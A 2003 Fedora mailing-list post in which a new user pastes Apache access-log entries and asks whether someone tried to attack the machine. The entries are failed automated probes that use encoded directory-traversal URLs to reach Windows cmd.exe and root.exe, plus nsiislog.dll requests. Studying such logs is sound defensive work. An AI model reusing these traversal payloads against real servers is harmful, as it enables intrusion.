attacked? hacked? help.....!

Lisa Durham lisa at natec.net
Tue Dec 9 05:26:52 UTC 2003


I am very new to Linux but was poking around in my newly setup Fedora 
Core 1 system today and came upon the lines below in the Apache Access 
Log when I used the "System Logs" icon in the System Tools Menu.

Is the IP at the beginning of each line the IP that requested the file 
that is shown at the end of the line? with the date and time in the 
center? If this isn't what's shown in this file, what is this format? 
What does this file tell me? Am I paranoid, or was someone trying to 
access my machine (but ignorantly assuming it was a Windows machine)?


quoted Apaches Access Log:

24.60.93.48 - - [07/Dec/2003:14:39:47 -0600] "GET 
/scripts/root.exe?/c+dir HTTP/1.0" 404 327 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:39:47 -0600] "GET /MSADC/root.exe?/c+dir 
HTTP/1.0" 404 325 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:39:47 -0600] "GET 
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:39:48 -0600] "GET 
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:39:48 -0600] "GET 
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:39:48 -0600] "GET 
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 366 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:39:49 -0600] "GET 
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 366 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:39:49 -0600] "GET 
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 382 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:39:52 -0600] "GET 
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:39:56 -0600] "GET 
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:39:56 -0600] "GET 
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:40:17 -0600] "GET 
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:40:18 -0600] "GET 
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 339 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:40:18 -0600] "GET 
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 339 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:40:19 -0600] "GET 
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 
"-" "-"
24.60.93.48 - - [07/Dec/2003:14:40:19 -0600] "GET 
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
211.239.107.43 - - [07/Dec/2003:15:40:29 -0600] "GET 
/scripts/nsiislog.dll" 404 331 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:01 -0600] "GET 
/scripts/root.exe?/c+dir HTTP/1.0" 404 327 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:01 -0600] "GET 
/MSADC/root.exe?/c+dir HTTP/1.0" 404 325 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:01 -0600] "GET 
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:01 -0600] "GET 
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:01 -0600] "GET 
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:01 -0600] "GET 
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 366 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:02 -0600] "GET 
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 366 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:02 -0600] "GET 
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 382 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:02 -0600] "GET 
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:02 -0600] "GET 
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:02 -0600] "GET 
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:02 -0600] "GET 
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:03 -0600] "GET 
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 339 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:03 -0600] "GET 
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 339 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:03 -0600] "GET 
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 
"-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:03 -0600] "GET 
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
217.120.149.161 - - [07/Dec/2003:18:27:17 -0600] "GET 
/scripts/nsiislog.dll" 404 331 "-" "-"

----------------------------------------

Thanks,
Lisa





More information about the fedora-list mailing list